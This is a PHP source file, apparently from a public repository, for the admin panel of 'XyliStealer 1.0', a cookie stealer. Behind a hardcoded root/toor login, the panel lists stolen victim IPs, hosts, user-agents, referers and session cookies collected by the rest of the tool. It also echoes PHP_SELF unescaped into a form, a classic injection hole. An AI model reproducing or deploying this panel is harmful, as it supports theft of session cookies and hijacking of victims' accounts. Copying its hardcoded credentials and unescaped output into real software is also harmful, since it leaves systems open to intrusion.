-
Notifications
You must be signed in to change notification settings - Fork 52
/
admin.php
95 lines (93 loc) · 2.7 KB
/
admin.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
<?php /*
__ __ _ _ _____ _ _ __ _____
\ \ / / | (_) ___| | | | / | | _ |
\ V / _ _| |_\ `--.| |_ ___ __ _| | ___ _ __ `| | | |/' |
/ \| | | | | |`--. \ __/ _ \/ _` | |/ _ \ '__| | | | /| |
/ /^\ \ |_| | | /\__/ / || __/ (_| | | __/ | _| |_\ |_/ /
\/ \/\__, |_|_\____/ \__\___|\__,_|_|\___|_| \___(_)___/
__/ |
|___/ By Xylitol
*/ ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Style-Type" CONTENT="text/css">
<meta name="robots" content="index, follow, all" />
<meta name="description" content="XyliStealer 1.0" />
<meta name="keywords" content="XyliStealer 1.0" />
<meta name="author" CONTENT="Xylitol">
<title>XyliStealer 1.0</title>
<style type="text/css">
<!--
body,td,th {
color: #FF0033;
}
body {
background-color: #000000;
}
.Style1 {
color: #00CC33;
font-weight: bold;
}
-->
</style></head>
<body>
<table width="535" border="1" align="center">
<tr>
<td width="525"><div align="center"><span class="Style1">XyliStealer 1.0</span></div></td>
</tr>
</table>
<p> </p>
<p><?php
$LOGIN="root"; //login
$PASSWD="toor"; //password
if ($_POST['logintext']==$LOGIN && $_POST['passwdtext']==$PASSWD) { ?>
<html>
<body>
<p><br />
Cookies:</p>
<table width="726" border="1">
<tr><td>IP:</td><td>Host:</td><td>User-Agent:</td><td>Date:</td><td>Time:</td><td>Referer:</td><td>Cookie:</td></tr>
<!-- Breakpoint -->
</table>
<p> </p>
<table width="535" border="1" align="center">
<tr>
<td width="525"><div align="center"><span class="Style1">fuck this ugly design, seriously !</span></div></td>
</tr>
</table>
</body>
</html>
<?php } else { ?>
<html>
<body>
<p>Log in to continue</p>
<form name="connexion" action="<?php echo ($_SERVER['PHP_SELF']); ?>" method="post">
<table width="298" border="1">
<tr>
<td width="102">Login :</td>
<td width="180"><input name="logintext" type="text" size="30" maxlength="30" /></td>
</tr>
<tr>
<td>Password :</td>
<td><input name="passwdtext" type="text" size="30" maxlength="30" /></td>
</tr>
</table>
<table width="298" border="0">
<tr>
<td><div align="center">
<input name="envoi" type="submit" value="-= Connect =-" />
</div></td>
</tr>
</table>
</form>
<p> </p>
<table width="535" border="1" align="center">
<tr>
<td width="525"><div align="center"><span class="Style1">fuck this ugly design, seriously !</span></div></td>
</tr>
</table>
</body>
</html>
<?php } ?>